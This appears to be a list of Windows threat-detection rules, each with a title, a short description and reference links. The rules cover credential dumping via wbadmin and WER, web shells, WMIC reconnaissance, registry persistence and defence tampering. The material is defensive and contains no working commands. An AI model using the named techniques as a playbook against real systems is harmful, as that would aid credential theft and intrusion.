Sensitive File Dump Via Wbadmin.EXE Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml, https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup
File Recovery From Backup Via Wbadmin.EXE Detects the recovery of files from backups via "wbadmin.exe". Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery, https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/
Sensitive File Recovery From Backup Via Wbadmin.EXE Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml, https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup
Potentially Suspicious WebDAV LNK Execution Detects possible execution via LNK file accessed on a WebDAV server. https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462
Chopper Webshell Process Pattern Detects patterns found in process executions caused by China Chopper-like tiny (ASPX) webshells https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/
Webshell Hacking Activity Patterns Detects certain parent-child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system https://youtu.be/7aemGhaE9ds?t=641
Webshell Detection With Command Line Keywords Detects certain command line parameters often used during reconnaissance activity via web shells https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html, https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/, https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild
Suspicious Process By Web Server Process Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
Potential Credential Dumping Via WER Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass https://github.com/deepinstinct/Lsass-Shtinkering, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
Webshell Tool Reconnaissance Activity Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html
Potential ReflectDebugger Content Execution Via WerFault.EXE Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html, https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/
Suspicious Child Process Of Wermgr.EXE Detects suspicious Windows Error Reporting manager (wermgr.exe) child process https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html, https://www.echotrail.io/insights/search/wermgr.exe, https://github.com/binderlabs/DirCreate2System
Suspicious Execution Location Of Wermgr.EXE Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location. https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html, https://www.echotrail.io/insights/search/wermgr.exe, https://github.com/binderlabs/DirCreate2System
Suspicious File Download From IP Via Wget.EXE Detects potentially suspicious file downloads directly from IP addresses using Wget.exe https://www.gnu.org/software/wget/manual/wget.html
Suspicious File Download From File Sharing Domain Via Wget.EXE Detects potentially suspicious file downloads from file sharing domains using wget.exe https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
Suspicious File Download From IP Via Wget.EXE - Paths Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe https://www.gnu.org/software/wget/manual/wget.html
Suspicious Where Execution Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md
Enumerate All Information With Whoami.EXE Detects the execution of "whoami.exe" with the "/all" flag https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/, https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s
Whoami Utility Execution Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/
Whoami.EXE Execution From Privileged Process Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/
Group Membership Reconnaissance Via Whoami.EXE Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami
Whoami.EXE Execution With Output Option Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use. https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/, https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s
Whoami.EXE Execution Anomaly Detects the execution of whoami.exe with suspicious parent processes. https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/, https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s
Security Privileges Enumeration Via Whoami.EXE Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami
Suspicious WindowsTerminal Child Processes Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section) https://persistence-info.github.io/Data/windowsterminalprofile.html, https://twitter.com/nas_bench/status/1550836225652686848
Add New Download Source To Winget Detects usage of winget to add new additional download sources https://learn.microsoft.com/en-us/windows/package-manager/winget/source, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
Add Insecure Download Source To Winget Detects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos) https://learn.microsoft.com/en-us/windows/package-manager/winget/source, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
Add Potential Suspicious New Download Source To Winget Detects usage of winget to add new potentially suspicious download sources https://learn.microsoft.com/en-us/windows/package-manager/winget/source, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
Install New Package Via Winget Local Manifest Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later. https://learn.microsoft.com/en-us/windows/package-manager/winget/install#local-install, https://lolbas-project.github.io/lolbas/Binaries/Winget/, https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
Winrar Compressing Dump Files Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
Potentially Suspicious Child Process Of WinRAR.EXE Detects potentially suspicious child processes of WinRAR.exe. https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/, https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md
Winrar Execution in Non-Standard Folder Detects a suspicious winrar execution in a folder which is not the default installation folder https://twitter.com/cyb3rops/status/1460978167628406785
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
Remote Code Execute via Winrm.vbs Detects an attempt to execute code or create service on remote host via winrm.vbs. https://twitter.com/bohops/status/994405551751815170, https://redcanary.com/blog/lateral-movement-winrm-wmi/, https://lolbas-project.github.io/lolbas/Scripts/Winrm/
Remote PowerShell Session Host Process (WinRM) Detects remote PowerShell sessions by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html
Suspicious Processes Spawned by WinRM Detects suspicious processes, including shells, spawned from the WinRM host process Internal Research
Compress Data and Lock With Password for Exfiltration With WINZIP An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
Wlrmdr.EXE Uncommon Argument Or Child Process Detects the execution of "Wlrmdr.exe" with the "-u" command line flag, which allows anything passed to it to be an argument of the ShellExecute API and would therefore allow an attacker to execute arbitrary binaries. This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that possess "ParentImage" telemetry. https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ, https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/
New ActiveScriptEventConsumer Created Via Wmic.EXE Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence https://twitter.com/johnlatwc/status/1408062131321270282?s=12, https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
Potential Windows Defender Tampering Via Wmic.EXE Detects potential tampering with Windows Defender settings such as adding exclusion using wmic https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md, https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/, https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/
New Process Created Via Wmic.EXE Detects new process creation using WMIC via the "process call create" flag https://www.sans.org/blog/wmic-for-incident-response/, https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process
Computer System Reconnaissance Via Wmic.EXE Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc. https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/
Local Groups Reconnaissance Via Wmic.EXE Detects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
Hardware Model Reconnaissance Via Wmic.EXE Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/, https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks
Windows Hotfix Updates Reconnaissance Via Wmic.EXE Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat, https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
Process Reconnaissance Via Wmic.EXE Detects the execution of "wmic" with the "process" flag, which adversaries might use to list processes running on the compromised host or to list installed software hotfixes and patches. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
Potential Product Reconnaissance Via Wmic.EXE Detects the execution of WMIC in order to get a list of firewall and antivirus products https://thedfirreport.com/2023/03/06/2022-year-in-review/, https://www.yeahhub.com/list-installed-programs-version-path-windows/, https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product
Potential Product Class Reconnaissance Via Wmic.EXE Detects the execution of WMIC in order to get a list of firewall and antivirus products https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md, https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1
Service Reconnaissance Via Wmic.EXE An adversary might use WMI to check if a certain remote service is running on a remote device. When the query completes, service information is displayed on the screen if the service exists. A common feedback message is "No instance(s) Available" if the queried service is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
Uncommon System Information Discovery Via Wmic.EXE Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023. https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic, https://nwgat.ninja/getting-system-information-with-wmic-on-windows/, https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar, https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/, https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/, https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior
Potential Unquoted Service Path Reconnaissance Via Wmic.EXE Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py, https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
System Disk And Volume Reconnaissance Via Wmic.EXE An adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the `wmic` command-line utility and has been observed being used by threat actors such as Volt Typhoon. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
WMIC Remote Command Execution Detects the execution of WMIC to query information on a remote system https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
Service Started/Stopped Via Wmic.EXE Detects usage of wmic to start or stop a service https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
Potential SquiblyTwo Technique Execution Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html, https://twitter.com/mattifestation/status/986280382042595328, https://atomicredteam.io/defense-evasion/T1220/, https://lolbas-project.github.io/lolbas/Binaries/Wmic/
Suspicious WMIC Execution Via Office Process Office application called wmic to proxy execution through a LOLBIN process. This is often used to break the suspicious parent-child chain (Office app spawns LOLBin). https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
Suspicious Process Created Via Wmic.EXE Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsvr32", etc. https://thedfirreport.com/2020/10/08/ryuks-return/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
Application Terminated Via Wmic.EXE Detects calls to the "terminate" function via wmic in order to kill an application https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/, https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf
Application Removed Via Wmic.EXE Detects the removal or uninstallation of an application via "Wmic.EXE". https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic
Potential Tampering With Security Products Via WMIC Detects uninstallation or termination of security products using the WMIC utility https://twitter.com/cglyer/status/1355171195654709249, https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/, https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html
XSL Script Execution Via WMIC.EXE Detects the execution of WMIC with the "format" flag to potentially load XSL files. Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md
WmiPrvSE Spawned A Process Detects WmiPrvSE spawning a process https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html
Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell Detects PowerShell as a child of the WmiPrvSE process, which could be a sign of lateral movement via WMI. https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e
Suspicious WmiPrvSE Child Process Detects suspicious and uncommon child processes of WmiPrvSE https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml, https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/, https://twitter.com/ForensicITGuy/status/1334734244120309760
WMI Backdoor Exchange Transport Agent Detects a WMI backdoor in Exchange Transport Agents via WMI event filters https://twitter.com/cglyer/status/1182389676876980224, https://twitter.com/cglyer/status/1182391019633029120
WMI Persistence - Script Event Consumer Detects WMI script event consumers https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
UEFI Persistence Via Wpbbin - ProcessCreation Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c, https://persistence-info.github.io/Data/wpbbin.html
Potential Dropper Script Execution Via WScript/CScript Detects wscript/cscript executions of scripts located in user directories https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://redcanary.com/blog/gootloader/
Cscript/Wscript Potentially Suspicious Child Process Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others. Internal Research, https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_30.10.2023.txt, https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_22.12.2023.txt
Cscript/Wscript Uncommon Script Extension Execution Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension Internal Research
WSL Child Process Anomaly Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/, https://twitter.com/nas_bench/status/1535431474429808642
Windows Binary Executed From WSL Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships Internal Research
Proxy Execution Via Wuauclt.EXE Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. https://dtm.uk/wuauclt/, https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/
Suspicious Windows Update Agent Empty Cmdline Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags https://redcanary.com/blog/blackbyte-ransomware/
Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths. https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html, https://www.echotrail.io/insights/search/wusa.exe/
Wusa.EXE Executed By Parent Process Located In Suspicious Location Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges. https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document
Xwizard.EXE Execution From Non-Default Location Detects the execution of Xwizard tool from a non-default directory. When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll". https://lolbas-project.github.io/lolbas/Binaries/Xwizard/, http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
COM Object Execution via Xwizard.EXE Detects the execution of the Xwizard tool with the "RunWizard" flag and a GUID-like argument. This utility can be abused in order to run a custom COM object created in the registry. https://lolbas-project.github.io/lolbas/Binaries/Xwizard/, https://www.elastic.co/guide/en/security/current/execution-of-com-object-via-xwizard.html, https://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
Potential Process Hollowing Activity Detects when a memory process image does not match the disk image, indicative of process hollowing. https://twitter.com/SecurePeacock/status/1486054048390332423?s=20, https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/
Potential Defense Evasion Via Raw Disk Access By Uncommon Tools Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Potential NetWire RAT Activity - Registry Detects registry keys related to NetWire RAT https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing, https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/, https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/, https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line, https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
Potential Persistence Via New AMSI Providers - Registry Detects when an attacker registers a new AMSI provider in order to achieve persistence https://persistence-info.github.io/Data/amsi.html, https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c
Potential COM Object Hijacking Via TreatAs Subkey - Registry Detects COM object hijacking via TreatAs subkey https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
Potential Persistence Via Disk Cleanup Handler - Registry Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. https://persistence-info.github.io/Data/diskcleanuphandler.html, https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/
Potential Persistence Via Logon Scripts - Registry Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md
PUA - Sysinternal Tool Execution - Registry Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key https://twitter.com/Moti_B/status/1008587936735035392
Suspicious Execution Of Renamed Sysinternals Tools - Registry Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool) Internal Research
PUA - Sysinternals Tools Execution - Registry Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key. https://twitter.com/Moti_B/status/1008587936735035392
Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. https://learn.microsoft.com/en-us/windows/client-management/manage-recall, https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis
Folder Removed From Exploit Guard ProtectedFolders List - Registry Detects the removal of folders from the "ProtectedFolders" list of Exploit Guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/
Terminal Server Client Connection History Cleared - Registry Detects the deletion of registry keys containing the MSTSC connection history https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer, http://woshub.com/how-to-clear-rdp-connections-history/, https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html
Removal Of AMSI Provider Registry Keys Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://seclists.org/fulldisclosure/2020/Mar/45
Removal of Potential COM Hijacking Registry Keys Detects any deletion of entries in ".*\shell\open\command" registry keys. These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks. https://github.com/OTRF/detection-hackathon-apt29/issues/7, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md, https://learn.microsoft.com/en-us/windows/win32/shell/launch, https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand, https://learn.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code
Removal Of Index Value to Hide Schedule Task - Registry Detects when the "index" value of a scheduled task is removed or deleted from the registry, which effectively hides it from any tooling such as "schtasks /query" https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
Removal Of SD Value to Hide Schedule Task - Registry Detects the removal of the SD (Security Descriptor) value in the \Schedule\TaskCache\Tree registry hive to hide a scheduled task. This technique is used by Tarrask malware https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/
Creation of a Local Hidden User Account by Registry Sysmon registry detection of a local hidden user account. https://twitter.com/SBousseaden/status/1387530414185664538
Pandemic Registry Key Detects Pandemic Windows Implant https://wikileaks.org/vault7/#Pandemic, https://twitter.com/MalwareJake/status/870349480356454401
